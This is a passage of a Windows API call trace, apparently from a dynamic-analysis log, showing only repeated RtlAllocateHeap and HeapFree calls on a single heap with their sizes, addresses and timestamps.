(HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0200.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0200.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0200.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0200.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0200.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0200.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0200.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0200.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0200.041] RtlAllocateHeap (HeapHandle=0x2c0000, 